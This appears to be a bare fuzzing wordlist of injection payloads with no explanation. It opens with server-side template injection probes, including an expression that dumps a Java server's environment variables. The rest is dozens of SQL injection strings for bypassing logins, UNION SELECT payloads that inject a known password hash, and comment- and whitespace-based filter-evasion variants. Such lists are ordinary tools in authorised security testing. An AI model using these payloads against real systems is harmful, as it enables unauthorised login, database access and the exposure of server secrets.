{{2*2}}[[3*3]]
{{3*'3'}}
<%=%203%20*%203%20%>
%23{%203%20*%203%20}
%23{3*3}
@(6+5)
${{7*7}}
${T(java.lang.System).getenv()}
${1+1}%20
{{dump(app)}}
{{7*'7'}}
@(1+2)
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
' --
' #
'/*
' or '1'='1
' or '1'='1'--
' or '1'='1'#
' or '1'='1'/*
'or 1=1 or ''='
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--
') or ('1'='1'#
') or ('1'='1'/*
') or '1'='1
') or '1'='1'--
') or '1'='1'#
') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" --
" #
"/*
" or "1"="1
" or "1"="1"--
" or "1"="1"#
" or "1"="1"/*
"or 1=1 or ""="
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*
 " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
%A0and%A01=1%A0--
/*comment*/and/**/1=1/**/--
)and(1)=(1)--
 aNd 1=1#